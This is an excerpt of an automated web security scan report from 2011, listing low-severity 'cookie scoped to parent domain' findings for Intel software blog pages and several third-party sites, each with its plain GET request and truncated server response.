Set-Cookie: PHPSESSID=288fc6a5a0c3418583dcc32f57fcb672; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:52 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

11.31. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=a4e51d252757c97212e7d2d038ee7a76; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 38246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.32. http://software.intel.com/en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:55 GMT
Content-Length: 519
Connection: close
Set-Cookie: PHPSESSID=43768f37fef278f86fa1efb8d4f61896; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:55 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

11.33. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=23acb205107344b897198d1b0053cbc6; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 36724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.34. http://software.intel.com/en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:50 GMT
Content-Length: 512
Connection: close
Set-Cookie: PHPSESSID=de5232cce9bb1b07e0e2c06efb170581; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:50 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

11.35. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=3132f08882351b5b69f11ba86bbd295a; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 36511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.36. http://software.intel.com/en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:46 GMT
Content-Length: 578
Connection: close
Set-Cookie: PHPSESSID=00b720de8f611fc1545738ce8829c525; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:46 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

11.37. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=d05389110c2d2011353f05e29b09f232; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 36400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.38. http://software.intel.com/en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:44 GMT
Content-Length: 510
Connection: close
Set-Cookie: PHPSESSID=0b26808766bae72a678c3d39c963c461; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:44 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

11.39. http://software.intel.com/en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:40 GMT
Content-Length: 20519
Connection: close
Set-Cookie: PHPSESSID=a638f3cc0588735e2cef74d00d31654d; path=/; domain=intel.com
Set-Cookie: loginpt=0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.40. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=870d40b73302ba266471c5df270a786b; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 38292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.41. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/parallel-programmaing-talk-show-98-a-visit-with-dr-fortran-steve-lionel-discusses-coarrays-in-fortran/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:37 GMT
Content-Length: 580
Connection: close
Set-Cookie: PHPSESSID=9f96f042ab3fd9912fec4ad3f015ce74; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:37 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

11.42. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:21:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=7c7fa33f5e3871a2f2f8ad2e5fc6cc5f; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 40744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.43. http://software.intel.com/en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/blogs/2011/02/04/parallel-programming-talk-97-viewer-q-and-a/feed/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/xml;charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:37 GMT
Content-Length: 522
Connection: close
Set-Cookie: PHPSESSID=6d3271afbdfbfe0b4dd22d4ac3e9d131; path=/; domain=intel.com
Set-Cookie: loginpt=0
Set-Cookie: loginpt=0

<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sat, 05 Feb 2011 23:21:37 +0000 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<atom:link href="http://softwa
...[SNIP]...

11.44. http://software.intel.com/sites/academic_showcase/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://software.intel.com
Path:   /sites/academic_showcase/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/academic_showcase/ HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:22:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=f5d3a15404bf24e6472fb4f75010d9f2; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 50705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...

11.45. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:15 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=bu17mduk7is8kedhijahsmb432; expires=Tue, 01-Mar-2011 02:50:35 GMT; path=/; domain=.opensource.org
Last-Modified: Sat, 05 Feb 2011 23:16:15 GMT
ETag: "5bc4ba8773ce80095954738aa6226440"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

11.46. http://www.sigcse.org/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sigcse.org
Path:   /<BR/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /<BR/ HTTP/1.1
Host: www.sigcse.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 23:15:20 GMT
Server: Apache/2.2.11 (Unix) DAV/2 PHP/5.2.9 SVN/1.6.2 mod_ssl/2.2.11 OpenSSL/0.9.7a mod_jk/1.2.26 mod_python/3.3.1 Python/2.4.4
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS01751fc7542c8565e6d3f32029062982=efohpkcr1poe9o8iif13jis6f0; expires=Tue, 01-Mar-2011 02:48:40 GMT; path=/; domain=.sigcse.org
Last-Modified: Sat, 05 Feb 2011 23:15:20 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 10731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">
<head>
<meta
...[SNIP]...

11.47. http://code.google.com/p/simplemodal/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/simplemodal/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/simplemodal/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:20 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=a7fb3fbbcf17b918:TM=1296947840:LM=1296947840:S=gIUVNf4Re7eiOItb; expires=Mon, 04-Feb-2013 23:17:20 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">

(function(){funct
...[SNIP]...

11.48. http://code.google.com/p/swfobject/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.google.com
Path:   /p/swfobject/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p/swfobject/ HTTP/1.1
Host: code.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:22 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Set-Cookie: PREF=ID=7e8aad9ba4ff032e:TM=1296947843:LM=1296947843:S=KYp7vW6FHX8bFUHr; expires=Mon, 04-Feb-2013 23:17:23 GMT; path=/; domain=.google.com
Server: codesite
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/vnd.microsoft.icon" href="http://www.gstatic.com/codesite/ph/images/phosting.ico">

<script type="text/javascript">


var codesite_
...[SNIP]...

11.49. http://m.youtube.com/details

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.youtube.com
Path:   /details

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /details?v=i73f0pQBfQ8 HTTP/1.1
Host: m.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Sat, 05 Feb 2011 23:21:27 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: VISITOR_INFO1_LIVE=cCy2OmNz5kY; path=/; domain=.youtube.com; expires=Mon, 03-Oct-2011 23:21:27 GMT
Set-Cookie: GEO=3216092b72f09a7334fb8e5b55f6c77fcwsAAAAzVVOtwdbzTU3bdw==; path=/; domain=.youtube.com
Set-Cookie: NO_MOBILE=; path=/; domain=.youtube.com; expires=Thu, 01-Jan-1970 00:00:00 GMT
Expires: Tue, 27 Apr 1971 19:44:06 EST
Content-Length: 0
Cache-Control: no-cache
Location: http://m.youtube.com/watch?v=i73f0pQBfQ8
Content-Type: text/html; charset=utf-8
Connection: close


11.50. http://www.facebook.com/Intel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /Intel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Intel HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=PvG3c; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 23:21:09 GMT
Content-Length: 43972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.51. http://www.facebook.com/sharer.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
